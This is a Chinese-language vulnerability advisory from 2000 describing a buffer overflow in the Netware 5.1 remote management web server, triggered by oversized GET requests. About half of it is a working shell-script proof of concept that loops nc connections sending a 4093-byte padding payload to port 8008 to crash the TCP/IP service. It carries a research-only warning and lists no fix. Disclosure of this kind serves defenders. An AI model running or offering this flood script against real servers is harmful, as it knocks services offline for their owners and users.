发布日期：2000-04-21
更新日期：2000-04-21

受影响系统：

Netware 5.1

描述：

---

      Netware 的远程管理工具允许入侵者远程执行任意代码。
      该远程管理工具是一个简单的webserver,如果发送的 "GET"
      请求大小在 4-8k 之间，入侵者就能写任意的数据进寄存器中。
      即使发送的不是可执行代码，也能导致一个 DoS 攻击，但这时
      整个服务器不会当掉，仅仅是服务器上的 tcp/ip服务不再接受
      任何地外来连接。

<*  来源: Michal Zalewski [lcamtuf@tpi.pl] *〉


测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

#!/bin/sh

SERVER=127.0.0.1
PORT=8008
WAIT=3

DUZOA=`perl -e '{print "A"x4093}'`
MAX=30

while :; do
  ILE=0
  while [ $ILE -lt $MAX ]; do
    (
      (
        echo "GET /"
        echo $DUZOA
        echo
      ) | nc $SERVER $PORT &
      sleep $WAIT
      kill -9 $!
    ) &>/dev/null &
    ILE=$[ILE+1]
  done
  sleep $WAIT
done

建议：

---

暂无

浏览次数：6160
严重程度：0（网友投票）